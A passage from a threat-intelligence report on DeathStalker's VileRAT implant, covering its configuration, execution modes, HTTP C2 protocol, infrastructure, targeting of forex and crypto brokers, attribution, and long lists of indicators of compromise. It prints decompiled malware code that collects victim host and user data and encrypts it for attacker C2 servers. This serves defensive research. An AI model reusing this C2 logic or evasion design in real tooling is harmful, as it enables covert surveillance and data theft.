The efforts that have been put into making a Python script (VileRAT) hard to analyze from a human perspective are a DeathStalker signature by themselves, considering they also tried the same for all the other steps in the infection chain, and that it is part of their usual approach.\r\nThe last unpacking step finally extracts the VileRAT Python code and a whole bundle of its dependencies in memory; all this content causes py2exe-bundled VileRAT samples to weigh around 12MB. The unpacking leverages decoding (using the Type B XOR algorithm) and BZIP2 decompression. The final VileRAT Python package notably contains a conf.pyc module which includes a version number, as well as default C2 domain names:\r\nVERSION = 7.2\r\nSVC_NAME = 'AJRouter'\r\nserver_urls = ['hxxp://pngdoma[.]com', 'hxxp://robmkg[.]com', 'hxxp://textmaticz[.]com', 'hxxp://goalrom[.]com']\r\nuser_agent_list = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36']\r\nVileRAT versions and functionalities\r\nWe analyzed and compared various VileRAT samples, containing version numbers ranging from 2.4 to 8. VileRAT functionalities have not changed much over time, and some functionalities from the earliest sample we analyzed have actually been dropped (such as leveraging SSH as a C2 channel, or screenshotting, the latter now being implemented in VileLoader instead). 
The remaining functionalities include:\r\nArbitrary remote command execution, using an existing or downloaded binary;\r\nEstablishing SSH connections to remote servers, possibly leveraging them to forward ports of the targeted computer to the remote server;\r\nKeylogging;\r\nSetting up persistence using scheduled tasks;\r\nListing security solutions that are installed on the target computer;\r\nSelf-updating from a C2 server.\r\nVileRAT has five distinct and exclusive execution modes, enabled from the command line, which can all be further altered with additional command switches, parameters and/or data from the C2:\r\nCommand line option (internal name(s)): execution mode description\r\n-a (enc_cmd_data, RUN_CMD_AS_USER_ARG): Arbitrary command execution. The “command” term is quite broad: it can either be an existing binary, a shell command, a downloaded executable, a Python package, or an internal VileRAT function. In order to specify the “command”, a JSON dictionary[2] is passed as an optional parameter. Some commands will be executed by starting VileRAT again, using a distinct set of command options. VileRAT exits after this execution.\r\n-l (enc_cmd_data_rss, RUN_R_SSH_SHELL_ARG): SSH connection test. VileRAT starts a new process of itself, which connects to a remote SSH server (using a private key), then… closes the connection. This SSH connection used to serve as a C2 channel in previous samples, but the C2 logic has been removed in recent samples. In order to specify the SSH connection settings, a JSON dictionary is passed as an optional parameter. VileRAT exits after this execution.\r\n-r (enc_cmd_data_rds, RUN_R_DYN_SSH_ARG): SSH-tunneled local port forward. VileRAT starts a new process of itself, which connects to a remote SSH server (using a password). 
This connection is leveraged as a tunnel to forward ports from the target computer to the remote server. In order to specify the SSH connection settings, a JSON dictionary is passed as an optional parameter. VileRAT quits once the remote end has connected to the forwarded port at least once, and subsequently closed the connection.\r\n-c (cp_exe_path): Arbitrary file deletion. VileRAT attempts to delete a file, whose path is given as a clear text command parameter. VileRAT quits when the file is deleted or when the maximum number of attempts (10) is reached.\r\n-t (rts, IS_TASK_SCHED_ARG): Main C2 client mode. This is the main execution mode for VileRAT. It regularly polls a C2 server for commands to execute. The commands that can be executed are one of those described in this table (RUN_R_SSH_SHELL_ARG, RUN_CMD_AS_USER_ARG, RUN_R_DYN_SSH_ARG), or one of the additional VileRAT internal update commands. CMD_UPDATE_SVC triggers a (partial or complete) VileRAT update from a C2-downloaded package, while CMD_UPDATE_CONF can update internal delays and enable a keylogger if the C2 requires so.\r\nIn a typical first execution for VileRAT, as we identified in 2022, the implant is started with the following arguments:\r\nImagesInfo.exe \"[u]\" -x -m \"EDP CredsTask\" -i\r\nNote that in this case, the target identifier that is passed as the first argument is not actually used by VileRAT, and may just serve the attacker to easily identify running VileRAT processes later. 
Older VileRAT variants were usually\r\nlaunched with explicit “-f” and “-t” command line switches: those are now implicit and enabled by default.\r\nHere is a list of some notable VileRAT changes we spotted as the versions evolved, apart from regular updates to fix code\r\nbugs or handle uncaught exceptions, refactor code, update dependencies, and change configuration:\r\nBetween versions 2.4 and 2.7, VileRAT dropped the capability to use a remote SSH server as a C2 channel, as well as\r\nthe screenshot implementation;\r\nIn version 3.0, the base64-encoded RC4 key which is used for various encryption routines changed from\r\n“Ixada4bxU3G0AgjcX+s0AYndBs4wiviTVIAwDiiEPPA=” to\r\n“XMpPrh70/0YsN3aPc4Q4VmopzKMGvhzlG4f6vk4LKkI=”, and an additional XOR pass (of Type B) was added in\r\nencoding schemes. The VileRAT remote update mechanism was refactored, and an additional command switch\r\n(called pmode) was added;\r\nIn version 3.7, specific Chrome version and Trezor wallet reconnaissance functions that we initially identified for\r\nversion 2.4 were removed from the code, and VileRAT lost the ability to update from files provided on the filesystem\r\nwhere it was running;\r\nIn version 5.4, the way UUID-type identifiers were generated changed;\r\nIn version 6.5, an additional command switch (called jmode) was added;\r\nIn version 6.6, “-f” and “-t” command options were enabled by default.\r\nVileRAT HTTP C2 protocol\r\nVileRAT’s main C2 communication loop, as executed during Main C2 client mode (as described in VileRAT functionalities\r\nabove), is quite straightforward and runs in a separate thread:\r\nEvery 2-5 minutes, VileRAT tries to send an HTTP POST request to each of the C2 servers that exist in its\r\nconfiguration, until one replies or until the list is exhausted. 
Environment data is embedded in a JSON dictionary,\r\nwhich is encrypted using RC4, encoded using the Type B XOR algorithm, base64-encoded and URL-encoded, then\r\nfinally set as the HTTP request URL path (see Figure 14);\r\nA C2 server may reply with an HTTP response, whose body can include an encoded and encrypted JSON array. If so,\r\nthe JSON must contain at least a command to execute.\r\ndef get_request_data(req_type, xmode, pmode):\r\n    data = {\r\n        'type': 'svc',\r\n        'xmode': xmode,\r\n        'pmode': pmode,\r\n        'req_type': req_type,\r\n        'svc_ver': conf.VERSION,\r\n        'svc_name': conf.SVC_NAME,\r\n        'ext_uuid': get_ext_uuid(),\r\n        'svc_uuid': get_service_uuid(),\r\n        'old_svc_uuid': get_old_service_uuid(),\r\n        'host': get_hostname(),\r\n        'uname': get_username(),\r\n        'ia': win32.hap(),\r\n        'wv': win32.gwv(),\r\n        'dt': datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S'),\r\n        'xn': os.path.basename(sys.executable)\r\n    }\r\n    if req_type == REQ_GET_CMD:\r\n        data['gc'] = global_conf\r\n        data['klr'] = keylogger.kl_run\r\n        data['cr'] = win32.is_process_exist(exe_name='chrome.exe')\r\n        data['avs'] = get_av_list()\r\n    elif req_type in [REQ_FIRST_RUN, REQ_INSTALL_DONE]:\r\n        data['avs'] = get_av_list()\r\n    enc_data = quote(b64encode(encrypt_xor(rc4_encrypt(json.dumps(data).encode('utf-8')))), safe=\"~()*!.'\")\r\n    return enc_data\r\nFigure 14. VileRAT C2 request preparation function\r\nJust as in VileLoader, the User-Agent value in HTTP requests is randomly selected from a fixed list of possible values. 
The\r\nJSON that is passed to the C2 server can be broken down as follows (JSON key, followed by its value):\r\ntype: Fixed value set to “svc”.\r\nxmode: True if VileRAT is executed with the xmode command line switch; false otherwise.\r\npmode: True if VileRAT is executed with the pmode command line switch; false otherwise.\r\nreq_type: Internal C2 command request type, value can be get_cmd, update_done, screenshot, first_run,\r\ninstall_done or klgr.\r\nsvc_ver: Internal VileRAT version number as set in VileRAT’s configuration.\r\nsvc_name: Internal VileRAT implant name as set in VileRAT’s configuration.\r\next_uuid: Partial value of one of the mutexes VileRAT sets to ensure atomic execution. It can either be the same\r\nsystem UUID as the one collected by VileDropper as part of the target identifier generation, or a hard-coded one.\r\nsvc_uuid: The target identifier, generated again with the same algorithm used in VileDropper.\r\nold_svc_uuid: A hard-coded value, or the same system UUID as the one collected by VileDropper as part of the target\r\nidentifier generation, but represented using a different (and presumably older) custom algorithm.\r\nhost: Hostname of the target machine.\r\nuname: Username of the target.\r\nia: 1 if the user running VileRAT has administrator privileges; 0 otherwise.\r\nwv: Windows version, formatted as dwMajorVersion.dwMinorVersion (e.g., 10.0).\r\ndt: Timestamp of the HTTP request, formatted as YYYY-MM-DD HH-MM-SS.\r\nxn: VileRAT’s filename.\r\navs: JSON list of installed security products names (e.g., [“windows defender”, “kaspersky internet\r\nsecurity”]), as retrieved from WMI by VileRAT.\r\nThe C2 answer is expected as an encoded and encrypted JSON list (leveraging the same coding and cryptographic methods\r\nas for the JSON in the HTTP request). Each item in the list must be a JSON dictionary that contains at least a “cmd” key. 
Its\r\nvalue can be one of: update_svc, ssh_rshell, r_cmd, ssh_rdyn or update_conf. Additional JSON key/value pairs can exist in\r\nthe dictionary and are passed to internal commands as parameters.\r\nA few words about VileRAT’s infrastructure\r\nWe looked for distinctive characteristics in the C2 domains we could retrieve from the samples gathered (either malicious DOCX files,\r\nDOTM files and their macros, VileDropper, VileLoader or VileRAT) and that are described in this report. We ignored\r\ndomains registered before mid-October 2021 because most of them were already disclosed in public sources (all known\r\nmalicious domains and IPs are listed in full in the indicators of compromise section below). It should be noted that to date,\r\nwe have identified hundreds of domains associated with VileRAT’s infection chain.\r\nThis allowed us to identify some likely VileRAT-specific infrastructure creation preferences:\r\nStarting from October 2021 at the latest, DeathStalker infrastructure IPs all belong to AS42159 (DELTAHOST UA,\r\nlocated in NL). According to our telemetry, DeathStalker likely started to leverage servers with IP addresses from this\r\nAS (along with others) as early as June 2021;\r\nMalicious domain names are often batch-registered (several domains on the same day) at NAMECHEAP, Porkbun\r\nLLC or PDR Ltd.;\r\nA lot of malicious domain names try to masquerade as the names of seemingly legitimate digital service providers (such as\r\n“azcloudazure[.]com” or “amzbooks[.]org”), and some denote a possible attempt to leverage events of worldwide\r\ninterest to conduct attack campaigns (such as “weareukrainepeople[.]com” or “covidsrc[.]com”);\r\nDomain usage seems to be separated most of the time (one domain is used only for either infection DOCX/DOTM,\r\nVileLoader or VileRAT), which might indicate a desire by the threat actor to tightly cluster its operations. 
But all those\r\ndomains usually point to a very limited set of IP addresses;\r\nA quick analysis of the characteristics of the services exposed on C2 IPs during malicious activities allowed us to\r\nnote common signatures: the HTTP service sends a combination of content and header values that could only be\r\nretrieved from such malicious infrastructure.\r\nVileRAT’s targets\r\nFrom August 2021 to the present day, using only data that we could check with our own telemetry, we identified 10\r\ncompromised or targeted organizations in Bulgaria, Cyprus, Germany, the Grenadines, Kuwait, Malta, the United Arab\r\nEmirates and the Russian Federation (see Figure 15).\r\nFigure 15. Map of organizations targeted by DeathStalker’s VileRAT campaign (darker color indicates a higher\r\nconcentration)\r\nWe could not profile all the identified organizations, but half of them were foreign currency (FOREX) and cryptocurrency\r\nexchange brokers. Some identified malicious documents and infrastructure domains contain (parts of) the targeted\r\norganizations’ names, and confirm this targeting.\r\nIt should be noted that the identified organizations range from recent startups to established industry leaders, including\r\ndubious cryptocurrency exchange platforms. Locating such organizations is extremely difficult from the limited data we\r\nhave at hand, because a small FOREX company might, for instance, host its infrastructure in various foreign countries,\r\nemploy several remote workers from different countries, and be legally based in a tax haven.\r\nAttribution\r\nWhen we first discovered VileRAT in June 2020, we initially attributed the implant and associated infection chain to\r\nDeathStalker. 
This first attribution was mainly based on similarities with previously known EVILNUM campaigns (common\r\nspecific metadata in LNK files, similar TTPs – notably the spear-phishing approach leveraging Google Drive files and fake\r\npersonas, consistent victimology). The tie between EVILNUM campaigns and DeathStalker has already been demonstrated\r\nin our previous article.\r\nWe still believe with high confidence that the described updated implants and associated infection chain are developed and\r\noperated by DeathStalker:\r\nThe main implants (VileLoader, VileRAT) that are leveraged for this campaign are updates of previously analyzed\r\nones, and still share a large majority of code and implementation specifics with previous samples;\r\nThe various components of the described infection chain (DOCX, macro-enabled DOTM, VileDropper) share\r\nimplementation logic and techniques that have previously been leveraged by DeathStalker as part of other campaigns\r\n(PowerSing and PowerPepper notably):\r\nUsing malicious documents (fetched from emails) as an infection vector;\r\nSignaling infection progress and errors to remote servers;\r\nUsing a similarly implemented XOR algorithm for string obfuscation (in DOTM macros, and in previously\r\ndocumented PowerPepper loaders);\r\nLeveraging Office object properties as hidden data sources;\r\nUsing similarly implemented hash-like functions with a preset constant (to generate a target identifier in\r\nVileDropper, to decode an IP address in PowerSing).\r\nConclusion\r\nVileRAT, its loader and associated infection chain were continuously and frequently updated for more than two years, and\r\nare still leveraged to persistently target foreign currency and cryptocurrency exchange brokers, with a clear intent to escape\r\ndetection.\r\nEscaping detection has always been a goal for DeathStalker, for as long as we’ve tracked the threat actor. 
But the VileRAT\r\ncampaign took this desire to another level: it is undoubtedly the most intricate, obfuscated and tentatively evasive campaign\r\nwe have ever identified from this actor. From state-of-the-art obfuscation with VBA and JS, to multi-layered and low-level\r\npacking with Python, a robust multi-stage in-memory PE loader, and security vendor-specific heuristic bypasses, nothing has\r\nbeen left to chance.\r\nConsidering the vast and quickly changing associated infrastructure as well, there is no doubt DeathStalker is making a\r\ntremendous effort to develop and maintain access. Yet, there are some glitches and inconsistencies: a final payload\r\nweighing more than 10MB (VileRAT), simple infection vectors, lots of suspicious communication patterns, noisy and easily\r\nidentified process executions or file deployments, as well as sketchy development practices leaving bugs and requiring\r\nfrequent implant updates. As a result, an efficient and properly set up endpoint protection solution will still be able to detect\r\nand block most of VileRAT’s related malicious activities.\r\nPutting these facts into perspective, we believe DeathStalker’s tactics and practices are nonetheless sufficient (and have\r\nproven to be) to act on soft targets who may not be experienced enough to withstand such a level of determination, who may\r\nnot have made security one of their organization’s top priorities, or who frequently interact with third parties that did not do\r\nso. 
We still, however, cannot determine what DeathStalker’s principal intention against such targets is: it could range from\r\ndue diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding its customers in\r\nworking around sanctions and/or spying on the targets’ customers, but it still does not appear to be direct financial gain.\r\nIndicators of compromise\r\nInfection DOCX MD5 hashes\r\n09FB41E909A0BCA1AB4E08CB15180E7C\r\n0B4F0EAD0482582F7A98362DBF18C219\r\n0CB7936975F74EA2C4FA476A6E3D5A05\r\n15C62D22495CA5AA4BB996B2CB5FEB7F\r\n1AAFBE60E4D00A3BFFDB76FA43C2ADBB\r\n237831757F629BA61C202B51E0026C9B\r\n238CD8435ADFFDAEBBF9D7489764648A\r\n241AD2BB7E703343F477960B39A8B300\r\n257754E9CD6EEC6DB5323E282FB16A74\r\n2BAADB95EF832CF5EB550121FA0292D0\r\n2C6314821C64F235E862B38DADEE535E\r\n2F8817B75D81C2F029FA70DE69B4A94B\r\n3C4F409A7926731254B44CA6526DCED1\r\n3C9A5A69CC928A39519178DA2A8EFFB6\r\n5BE87EC5A2F48483317A57CE120ACC0E\r\n609F595053D481C047D9C9B8C0F6B39C\r\n63090A9D67CE9534126CFA70716D735F\r\n77612466654702C7ED7C6B1C21CFAEFE\r\n77B4AF2734782DC7FC10A6FD7978AE80\r\n79157A3117B8D64571F60FE62C19BF17\r\n7C7D4DFAC6A2628B9921405F25188FE3\r\n8746077795FF9C33A591C7E261B7C7B8\r\n9352DBA6CC8AC67F22E62D7A1B5E51B6\r\n9895D0C19AC482F62C53AD8399F98B66\r\nA4B79DA85C6EE26D0EBEA444A60DB900\r\nA7FB4779F2A1C4A27DA2E74616DB7C31\r\nB09A35B75700D11A251BDFC51B1D08E9\r\nC212AF0C8A880697374E06B59376F991\r\nC59EB65B0B237E39AFED796C5B3DB417\r\nC75FC659F257291C9CCC94C3FF4B5A83\r\nC818E4BCA286C690156EFF37DAA2E209\r\nC86F8642560A6353ED2FE44F0C6B07E8\r\nD72B649DF88D78441D5629AF99FA1D40\r\nE0D474AF77E89BF1C2DBB7D7A5F8ACE9\r\nE28F2F0546EF07BC3425528D813EC954\r\nE375B63A76DADDFF5741B340AE7BD6A8\r\nE51CBCF89A26686C62350BAE371F8601\r\nE726520B3AD875B516DF6C3D25476444\r\nF0D3CFF26B419AFF4ACFEDE637F6D3A2\r\nFB75DDE8F9E473D019A6CBDBB0D2283A\r\nFF2558571EE99ED4AEC63A3980719034\r\nMacro-enabled DOTM remote templates MD5 hashes\r\n02C1EC61C4E740AF85B818A89E77E2C2\r\n75A3F8D143CF96C163106E21272FF170\r\n7FCC03D062AC8AA2BE8D7600B68FC53A\r\n82D841D7712AB0EE9F1BBB6B3D22821A\r\n93CE42F23B0800F257D355C0B10C8D79\r\nE6F9D538FCDF46493DF8ECB648F98D13\r\nVileDropper JavaScript MD5 hashes\r\n3C8052862B194F205AC5138BF07ADFBE\r\n43A2B45D25BB898DBBCB2EE36C909D64\r\n6E201A9BB9945BDC816A7A9C2DCF73B9\r\n7822FF3D5008E0B870BB03EF8D2032DC\r\n99F762D23451B9ABABA95BCE3F544FDB\r\nC97B0753A263E042EB6E3C72B2F6565F\r\nCABAF29E9763D18B0D0DFFBC576FDF3E\r\nVileLoader (stage 1 binary) MD5 hashes\r\n0456FA74B8CC6866C5D1CE9E15136723\r\n0BD06D2C17987C7B0C167F99BB4DC0B4\r\n0F3685A6ACA7991C209D41D0E2279861\r\n107A084A1C8A6E9E5B3BEF826C3443DC\r\n15A192BB683BD47956CC91B2CFCE3052\r\n161FE654DDED7AE74EE40F1854B9F81E\r\n174CF10F0F320B281B3FFBF782771AD7\r\n22DDB087EF3310B3F724544F74E28966\r\n237BAB121E846DCFA492E7CC5966EAD9\r\n2503B8AABEEB2649915126573307B648\r\n29EF001568851845B84F3CD163BFD439\r\n2A5ECA9B83A999E86054E53330F68F5B\r\n2DBEA08AFE245F246B500727B7D27761\r\n2FC7211C94B7C89968ACFAD8C084EE3B\r\n2FDDDA0DC33D3F8BAB906C43982AA4A2\r\n30CA78A99F49782942835B1C10E2834A\r\n33F1303842BDDC98205984E6ACF782F7\r\n344A41ECF89B5642B6FE0A695852AA1B\r\n36E60C00A64BAA014CF7A44CB9C9F410\r\n3C960DCC782A4D9552F0CC96451633C8\r\n3D127901AFD64EACE4C7B939FDBA90BB\r\n3E0A49646B9D5D0C63036692BA1C7315\r\n3FC5AB8A3EAB1D8CFF8530BBE2BAE608\r\n524909CB66848B1EE2987FDC0B69B451\r\n52B208E86C0DDE252200953A4EB71EA3\r\n52C1E4537424E151469E8E67DF07EFE6\r\n577497F9E9D4EA6070AA250B355DCFB1\r\n578E16856061F6CB760B06B1735F9143\r\n5BA950833DC55FE30F1E24CBCF1DEA3C\r\n5D9DB5350E1CA2D9DACBA75F4AA80AE0\r\n6677B435A7455579BC063BD9F7CBE65E\r\n6A1672401FFD7FB64DFE09A7A464067C\r\n6AED3D8D53CB4B90FF0EDA8803C7F1F5\r\n6E056456B2F40D2C47219C6DB24D9541\r\n700B71690C7902DEC10275A6AE320ADF\r\n77AC6332A5A4DE5712B66949AC8BF582\r\n7B478EDC2B74D7ECDC6B1D9532C9E7F8\r\n80A84624126B6D72FF5D1B25B80204C2\r\n82118066CF5EE34E7956F8D288B725E6\r\n85C09C35F85EDD1428208CD240A72BD8\r\n8B4905B5D0142EBD67B103E2CDD047E3\r\n8C377D184D88991388B7D0ED6CFB4A98\r\n8C4975EDB8C6BE37C416D9B6483E9BD5\r\n942D540F7608752233800AEB66BC8DC7\r\n977D5BABF7112F1B6072EAA1F3F896B8\r\n991CA8ECD3F4A70892CFF4FB774AF22B\r\nA82C6772F984A9B49A1512B913DA4332\r\nAB4B8D26D389C76B3D4A85E2CCB9E153\r\nB68915810F6DE276A706E7F4C37645EA\r\nB6EE9DAEA4B2D849793E651603A1512D\r\nBC162B6742AA1EA86A3B391D549EF969\r\nC21025561A3151F9EB2C728AAB5A7A90\r\nC3828CE2ED1453EFAAD442D150B79F6E\r\nC89D5BB8A36C0F2891B5A75834A7AD64\r\nCF8988662588C8FE943ECF42FC35E0B4\r\nD3E95C81D038CBF6EFC5AF3208313922\r\nDB1A697955F1140AED36864617F41425\r\nDB2179161FA0FC1694BD7425D1E80A5D\r\nDB6800CF6288BA0B7492F533F519CA24\r\nDC6F128A5316FB9AF66EA01190C63895\r\nE18078DCA1A1F452B06EC0D9C30982B6\r\nE3F106AF3E45C480BF9E45EB21617083\r\nE833910AB506B08DB2A0E7E1313C6556\r\nEA71FCC615025214B2893610CFAB19E9\r\nF02B13F9634604BE5388B3C13C7CEC8D\r\nF18D216B070744097846F96877865D1C\r\nF5884141B04503EE6AFB2A17FD7761FC\r\nF93FEE328737CB97D83701A4A50EAEFD\r\nFC5F0CC23280547E1D727534649B3DFA\r\nFFE01DCCC1AA70C80EBB1B9F8FCADF1F\r\nVileRAT (standalone) MD5 hashes\r\n348C99A209616FC674FCABCAFDDBA4A0\r\n99B54991FCE2C6D17CDEF7BBD60FDA27\r\nB0353610172416A9FFCD3E7FB7BAE648\r\nEC04E0D3EADF043A1219942051A2A147\r\nBB2113989478DB0AE1DFBF6450079252\r\n15BAF177FC6230CE2FCB483B052EB539\r\nBAB0B5BB50C349CEFD9DEDF869EB0013\r\nD3947C239A07090DEB7D4A9D21D68813\r\nB4183E52FB807689140ED5AA20808700\r\nA7B300D6CB0488358A80C512A64FF570\r\n8F20155F0D9541F7CB5C3BBDC402498B\r\n6D0B710057C82E7CCD59A125599C8753\r\n14D9D03CBB892BBBF9939EE8FFFDD2B5\r\nA62850FD3D7DEC757043AB33417E7A13\r\n03205E90135FD84D74AF8B38D1960994\r\nACCC6633AF50AEA83024AB5A0861375B\r\nE1956B827EF36A0DDE5C42F2C26AC8B6\r\nDBD9CBAEB27326EF2AEAD32292D70632\r\n8F9D01DC7D1EB9AB388BF94F0B926E3B\r\n6E79535F38248C7769365881C577DF29\r\nC2 IP addresses (each followed by the timeframe during which we observed it in use)\r\n185.161.208[.]172 2022-07, and 2021-06 to 07 at least\r\n185.161.208[.]207 2022-07 at least\r\n185.161.209[.]87 2022-06 at least\r\n185.161.208[.]209 2022-05 to 06 at least\r\n185.161.208[.]20 2022-04 to 06 at least\r\n185.161.208[.]225 2022-03 to 04 at least\r\n185.236.76[.]230 2022-03 to 04 at least\r\n185.236.76[.]30 2022-03 at least\r\n185.236.76[.]34 2022-03 at least\r\n185.161.209[.]223 2022-01 to 02 at least\r\n185.161.209[.]28 2022-01 to 02 at least\r\n185.161.208[.]166 2021-12 to 2022-01 at least\r\n185.161.208[.]182 2021-12 at least\r\n185.161.209[.]97 2021-11 and 08 at least\r\n185.236.76[.]21 2021-11 at least\r\n185.161.209[.]117 2021-10 at least\r\n185.161.208[.]64 2021-10 at least\r\n185.161.208[.]194 2021-09 to 10 at least\r\n185.161.209[.]170 2021-09 at least\r\n185.161.208[.]160 2021-07 to 09 at least\r\n193.56.28[.]201 2020-07 at least\r\n185.236.230[.]25 2020-07 at least\r\nC2 domain names\r\nNote: the C2 domain names have been identified in our own telemetry or extracted from malicious files that are described in\r\nthis article and that we analyzed. The domains may still have previously (or later) been used for legitimate purposes as\r\ndomains may get reused over time. Even if we could not notice such a conflict up to now, the resolution of a hostname that\r\nbelongs to such a domain should be checked against the previously listed C2 IP addresses before concluding that it is indicative\r\nof a compromise.\r\nrowfus[.]com\r\nshopadvs[.]com\r\nsvclouds[.]com\r\ncorstand[.]com\r\ngetappcloud[.]com\r\nhostboxapp[.]com\r\nweareukrainepeople[.]com\r\neroeurovc[.]com\r\nflightpassist[.]com\r\nihotel-deals[.]com\r\nmevcsft[.]com\r\nmsfsvctassist[.]com\r\npinktwinlers[.]com\r\nplantgrn[.]com\r\nwazalpne[.]com\r\naffijay[.]com\r\nupservicemc[.]com\r\nmsfbckupsc[.]com\r\nestimefm[.]org\r\nvisitaustriaislands[.]com\r\nbookaustriavisit[.]com\r\nhubflash[.]co\r\nbookingitnow[.]org\r\nplanetjib[.]com\r\nenigmadah[.]com\r\nqeliabhat[.]com\r\nqnmarry[.]com\r\npngdoma[.]com\r\nrobmkg[.]com\r\ntextmaticz[.]com\r\ngoalrom[.]com\r\ndeltacldll[.]com\r\nnortonalytics[.]com\r\nudporm[.]com\r\ndellscanhw[.]com\r\nmailcloudservices[.]org\r\nhpcloudlive[.]com\r\nwindowslive-detect[.]com\r\nzummaride[.]com\r\ncashcores[.]org\r\nthesailormaid[.]com\r\nmultizoom[.]org\r\npoccodom[.]com\r\nmsftmnvm[.]com\r\nplancetron[.]com\r\ncovidsrc[.]com\r\ncovidsvcrc[.]com\r\nmsftcd[.]com\r\nrombaic[.]com\r\ncargoargs[.]com\r\namazoncld[.]com\r\nprintauthors[.]com\r\namznapis[.]com\r\nthismads[.]com\r\nammaze[.]org\r\neroclasp[.]com\r\nmullticon[.]com\r\naudio-azure[.]com\r\nazure-affiliate[.]com\r\nservice-azure[.]com\r\nscan-eset[.]com\r\ncheck-avg[.]com\r\nadsmachineio[.]com\r\napi-pixtools[.]com\r\napi-printer-spool[.]com\r\ndriver-wds[.]com\r\nflowerads[.]cloud\r\nglobaladdressbook[.]cloud\r\nmsft-cdn[.]cloud\r\nwindows-accs[.]live\r\nwindows-ddnl[.]com\r\nfreepbxs[.]com\r\ntrvol[.]com\r\ntrvolume[.]net\r\ncorpxtech[.]com\r\nveritechx[.]com\r\nvvxtech[.]net\r\nextrasectr[.]com\r\ntrquotesys[.]com\r\nquotingtrx[.]com\r\nbooknerfix[.]com\r\nbgamifieder[.]com\r\nbook-advp[.]com\r\nnetwebsoc[.]com\r\nrefinance-ltd[.]com\r\nwindnetap[.]com\r\nn90app[.]com\r\nappdllsvc[.]com\r\nmeetomoves[.]com\r\nmoretraveladv[.]com\r\nhostedl[.]com\r\nagagian[.]com\r\ninformaxima[.]org\r\npolanicia[.]com\r\nam-reader[.]com\r\nliongracem[.]com\r\njmarrycs[.]com\r\nworldchangeos[.]com\r\ngvgnci[.]com\r\nananoka[.]com\r\nnetpixelds[.]com\r\nallmyad[.]com\r\nwicommerece[.]com\r\nshowsvc[.]com\r\nborisjns[.]com\r\ngovdefi[.]com\r\ndogeofcoin[.]com\r\nrealshbe[.]com\r\nquestofma[.]com\r\ncovidgov[.]org\r\ngovtoffice[.]org\r\ncovidaff[.]org\r\ncovsafezone[.]com\r\nmsftinfo[.]com\r\ninvgov[.]org\r\nanypicsave[.]com\r\nnavyedu[.]org\r\nanyfoodappz[.]com\r\ncloudazureservices[.]com\r\ndnserviceapp[.]com\r\npicodehub[.]com\r\nmusthavethisapp[.]com\r\nrefsurface[.]com\r\namazoncontent[.]org\r\nwizdomofdo[.]com\r\ntomandos[.]com\r\namazonappservice[.]com\r\namzncldn[.]com\r\nazurecontents[.]com\r\nphilipfin[.]com\r\ncloudhckpoint[.]com\r\ncheckpoint-ds[.]com\r\niteamates[.]com\r\nglobal-imsec[.]com\r\nprintfiledn[.]com\r\nmsftprintsvc[.]com\r\nworldsiclock[.]com\r\ndeuoffice[.]org\r\namazonpmnt[.]com\r\nalipayglobal[.]org\r\ncloudamazonft[.]com\r\napple-sdk[.]com\r\nazurecfd[.]com\r\napiygate[.]com\r\nmsftcrs[.]com\r\nsysconfwmi[.]com\r\ndnstotal[.]org\r\nnamereslv[.]org\r\nmailservicenow[.]com\r\ncloudreg-email[.]com\r\napidevops[.]org\r\nzerobitfan[.]com\r\nedwardpof[.]com\r\nmainsingular[.]com\r\ntotaledgency[.]com\r\nadmex[.]org\r\noutlookfnd[.]com\r\nbookfinder-ltd[.]com\r\nearthviehuge[.]com\r\nestoniaforall[.]com\r\njarviservice[.]org\r\nmoreofestonia[.]com\r\ntraveladvnow[.]com\r\ntripadvit[.]com\r\nadvideoc[.]org\r\nauzebook[.]com\r\nmslogger[.]org\r\nnetmsvc[.]com\r\nntlmsvc[.]com\r\nprodeload[.]com\r\nrealmacblog[.]com\r\nroblexmeet[.]com\r\nweatherlocate[.]com\r\ncrm-domain[.]net\r\nleads-management[.]net\r\nvoipasst[.]com\r\nvoipreq12[.]com\r\nvoipssupport[.]com\r\ntelefx[.]net\r\nSuspected C2 domain names\r\nNote: the suspected C2 domain names have been identified because they were both registered in a similar way to known\r\nC2 domain names, AND because associated hostnames pointed to known C2 IP addresses during a timeframe of known\r\nmalicious activity. While we believe with medium to high confidence the vast majority of these domains have been or could\r\nbe leveraged by DeathStalker, it is still possible that a few of them never supported malicious activities.\r\nadsoftpic[.]com\r\nazcloudazure[.]com\r\nazureservicesapi[.]com\r\ndiamondncenter[.]biz\r\nforceground[.]co\r\nmultitrolli[.]com\r\nsearchvpics[.]com\r\nsuperimarkets[.]com\r\nsymantecq[.]com\r\nyorkccity[.]com\r\ncosmoscld[.]com\r\noglmart[.]com\r\nshopamzn[.]org\r\naidobe-update[.]com\r\namzn-services[.]com\r\napplecloudnz[.]com\r\nesetupdater[.]com\r\nfastnetbrowsing[.]com\r\nfindmypcs[.]com\r\nflyingpackagetrack[.]com\r\nmcafee-secd[.]com\r\nmsfastbrowse[.]com\r\nmurfyslaws[.]com\r\nnetworkcanner[.]com\r\nnvidiaupdater[.]com\r\noauth-azure[.]com\r\noautho[.]com\r\norbiz[.]me\r\noutlooksyn[.]com\r\npdfscan-now[.]com\r\nsoundstuner[.]com\r\ntimetwork[.]com\r\nwingsnsun[.]com\r\nazuredllservices[.]com\r\nmailgunltd[.]com\r\nofficelivecloud[.]com\r\nkgcharles[.]com\r\nmstreamvc[.]com\r\nstreamsrvc[.]com\r\nwalltoncse[.]org\r\nwldbooks[.]com\r\ntravelbooknow[.]org\r\namzbooks[.]org\r\natomarket[.]org\r\nelitefocuc[.]com\r\nfutureggs[.]com\r\nnewedgeso[.]com\r\ntopotato[.]org\r\nwwcsport[.]org\r\nfiredomez[.]com\r\ngratedomofrome[.]com\r\nservicebu[.]org\r\nservicejap[.]com\r\nappcellor[.]com\r\ncloud-appint[.]com\r\ncoreadvc[.]com\r\nsellcoread[.]com\r\nallrivercenter[.]com\r\nmissft[.]com\r\nonesportinc[.]com\r\ntophubbyriver[.]com\r\nyourprintllc[.]com\r\nazuredcloud[.]com\r\nbingapianalyti